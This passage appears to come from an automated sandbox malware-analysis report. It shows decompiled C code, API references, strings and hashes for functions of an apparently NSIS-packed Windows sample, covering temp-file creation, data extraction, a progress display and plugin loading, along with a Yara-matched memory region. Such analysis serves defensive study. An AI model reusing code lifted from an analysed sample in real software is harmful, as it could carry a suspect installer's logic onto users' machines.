							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226e8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226e8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x0040556f
0x00405579
0x0040557e
0x00405584
0x0040558f
0x00405592
0x00405595
0x0040559b
0x0040559b
0x004055a1
0x004055a9
0x004055ac
0x004055c9
0x004055cd
0x004055d6
0x004055d6
0x004055e0
0x004055e9
0x004055f5
0x004055fc
0x00405600
0x00405603
0x00405616
0x00405624
0x00405624
0x00405628
0x0040562a
0x0040562d
0x00000000
0x0040562d
0x004055ae
0x004055b6
0x004055be
0x004055c4
0x00000000
0x004055c4
0x004055be
0x004055ac
0x00405639

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,004033ED), ref: 004055C4
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000), ref: 00406743

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll, xrefs: 0040558A, 0040559A, 004055A0, 004055C3, 004055CF

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll
API String ID: 1495540970-993556579
Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x418ec0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004034AF( *0x42a278 + _t56);
				}
				if(E00403499( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403499(0x414ec0, _t91) == 0) {
									goto L33;
								} else {
									if(E004060A9(_a8, 0x414ec0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403499(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406A2F(0x40ce30);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403499(0x414ec0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce48 = 0x414ec0;
						 *0x40ce4c = _t92;
						while(1) {
							 *0x40ce50 = _t81;
							 *0x40ce54 = _v12; // executed
							_t69 = E00406A4F(0x40ce30); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce50; // 0x418ec0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405569(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce50; // 0x418ec0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E004060A9(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dc
0x004032de
0x004032de
0x004032e3
0x004032e8
0x004032f3
0x004032f3
0x00403305
0x00403450
0x00403450
0x00000000
0x0040330b
0x0040330f
0x0040343b
0x00403484
0x00403455
0x0040345b
0x0040345d
0x0040345d
0x0040346e
0x00000000
0x00403470
0x0040347c
0x00403435
0x00403435
0x00403452
0x00403452
0x00000000
0x00403452
0x0040347e
0x00403481
0x00000000
0x00403481
0x0040346e
0x0040348f
0x00000000
0x0040348f
0x00403440
0x00403442
0x00403442
0x0040344e
0x0040348c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040344e
0x00403320
0x00403323
0x00403328
0x00403328
0x00403332
0x00403335
0x00000000
0x00000000
0x00000000
0x00000000
0x0040333b
0x0040333b
0x0040333b
0x00403343
0x00403345
0x00403345
0x00403356
0x00000000
0x00000000
0x0040335c
0x0040335f
0x00403365
0x0040336b
0x00403373
0x00403379
0x0040337e
0x00403385
0x00403388
0x00000000
0x00000000
0x0040338e
0x00403394
0x00403396
0x004033a3
0x004033a5
0x004033d6
0x004033dc
0x004033e8
0x004033ed
0x004033ed
0x004033f2
0x00403429
0x00000000
0x00000000
0x00000000
0x004033f4
0x004033f8
0x0040340d
0x00403410
0x00403413
0x00403419
0x0040341d
0x00000000
0x00000000
0x00000000
0x00403423
0x004033ff
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x004033f2
0x00403431
0x00000000
0x00403431
0x00000000
0x0040333b

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

G8@, xrefs: 004032B4
... %d%%, xrefs: 004033D0

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406864(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x0040687b
0x00406884
0x00406886
0x00406886
0x0040688a
0x0040689d
0x00406897
0x00406897
0x00406897
0x004068b6
0x004068ca
0x004068d1

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Strings

%s%S.dll, xrefs: 004068B0
\, xrefs: 0040688C
UXTHEME, xrefs: 0040686D

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A38(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a43
0x00405a47
0x00405a4a
0x00405a50
0x00405a54
0x00405a58
0x00405a60
0x00405a67
0x00405a6d
0x00405a74
0x00405a7b
0x00405a83
0x00405a85
0x00000000
0x00405a85
0x00405a8f
0x00405a96
0x00405aac
0x00000000
0x00000000
0x00000000
0x00405aae
0x00405ab2

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 033B2520 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L)MP, xrefs: 033B277C
`, xrefs: 033B2739
W7U, xrefs: 033B272A

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: L)MP$W7U$`
API String ID: 0-686354213
Opcode ID: 3bfdf79886b2d9ab292d4659125931c2f990719cb8ef763548ec8107a4483efa
Instruction ID: 43ef3b7ac05408dee5f3969ceb419efc9b49226192d52bcb2d3ccfbad1c9a255
Opcode Fuzzy Hash: 3bfdf79886b2d9ab292d4659125931c2f990719cb8ef763548ec8107a4483efa
Instruction Fuzzy Hash: C35123B6A003898FDF38DE359DA53EE3676AF56360F94821ADD5D8FA80D33046458F41

Uniqueness

Uniqueness Score: -1.00%

Function 70AC1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E70AC1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x70ac506c = _a8;
				 *0x70ac5070 = _a16;
				 *0x70ac5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70ac5048, E70AC1651);
				_push(1); // executed
				_t37 = E70AC1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E70AC243E(_t54);
					}
					_push(_t54);
					E70AC2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E70AC2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E70AC1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E70AC2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E70AC2655();
							_t37 = GlobalFree(E70AC1312(E70AC1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E70AC2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E70AC15DD( *0x70ac5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E70AC2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E70AC2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E70AC2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x70ac1817
0x70ac1817
0x70ac1817
0x70ac1824
0x70ac182c
0x70ac1839
0x70ac1847
0x70ac184a
0x70ac184c
0x70ac1851
0x70ac1856
0x70ac1978
0x70ac1978
0x70ac185c
0x70ac1860
0x70ac1863
0x70ac1868
0x70ac1869
0x70ac186a
0x70ac1870
0x70ac1876
0x70ac18a6
0x70ac18ad
0x70ac18d1
0x70ac191e
0x70ac191f
0x70ac18d3
0x70ac18d3
0x70ac18d4
0x70ac18dd
0x70ac18de
0x70ac18e8
0x70ac18eb
0x70ac18f0
0x70ac18f7
0x70ac18f7
0x70ac18fd
0x70ac18fe
0x70ac1904
0x70ac190a
0x70ac1917
0x70ac1918
0x70ac191b
0x70ac18af
0x70ac18af
0x70ac18b0
0x70ac18c5
0x70ac18c5
0x70ac1929
0x70ac192c
0x70ac1939
0x70ac1940
0x70ac1948
0x70ac194b
0x70ac194b
0x70ac1948
0x70ac1958
0x70ac1960
0x70ac1965
0x70ac1958
0x70ac196d
0x00000000
0x70ac196f
0x00000000
0x70ac1970
0x70ac196d
0x70ac187a
0x70ac187d
0x70ac189b
0x00000000
0x00000000
0x70ac189e
0x70ac18a3
0x70ac18a3
0x70ac18a5
0x00000000
0x70ac18a5
0x70ac187f
0x70ac1880
0x70ac1888
0x70ac1889
0x00000000
0x70ac1889
0x70ac1882
0x70ac1883
0x70ac1891
0x00000000
0x70ac1891
0x70ac1886
0x00000000
0x00000000
0x00000000
0x70ac1886

APIs

Part of subcall function 70AC1BFF: GlobalFree.KERNEL32(?), ref: 70AC1E74
Part of subcall function 70AC1BFF: GlobalFree.KERNEL32(?), ref: 70AC1E79
Part of subcall function 70AC1BFF: GlobalFree.KERNEL32(?), ref: 70AC1E7E

GlobalFree.KERNEL32(00000000), ref: 70AC18C5
FreeLibrary.KERNEL32(?), ref: 70AC194B
GlobalFree.KERNEL32(00000000), ref: 70AC1970

Part of subcall function 70AC243E: GlobalAlloc.KERNEL32(00000040,?), ref: 70AC246F

Part of subcall function 70AC2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70AC1896,00000000), ref: 70AC28E0

Part of subcall function 70AC1666: wsprintfW.USER32 ref: 70AC1694

Strings

, xrefs: 70AC1951

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: cf08bf019188839be7736d47e781015bf2afd108605aacb43f3b02e2ea7a645b
Instruction ID: dbd749a7f6c7a22847f0080761b18441d029320dc9a77436e458e2c2e5e2a917
Opcode Fuzzy Hash: cf08bf019188839be7736d47e781015bf2afd108605aacb43f3b02e2ea7a645b
Instruction Fuzzy Hash: E941C3726002019FCF009F70CE84B9F37BCAF0A314F164479F906AA29EDB74D4858760

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040602c
0x00406032
0x00406033
0x00406033
0x00406038
0x00406039
0x0040603c
0x00406041
0x00406044
0x0040604e
0x0040605b
0x0040605f
0x00406067
0x00000000
0x00000000
0x0040606b
0x00000000
0x0040606d
0x0040606d
0x0040606d
0x00406070
0x00406073
0x00406073
0x00406076
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040602B
nsa, xrefs: 00406033

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407033() {
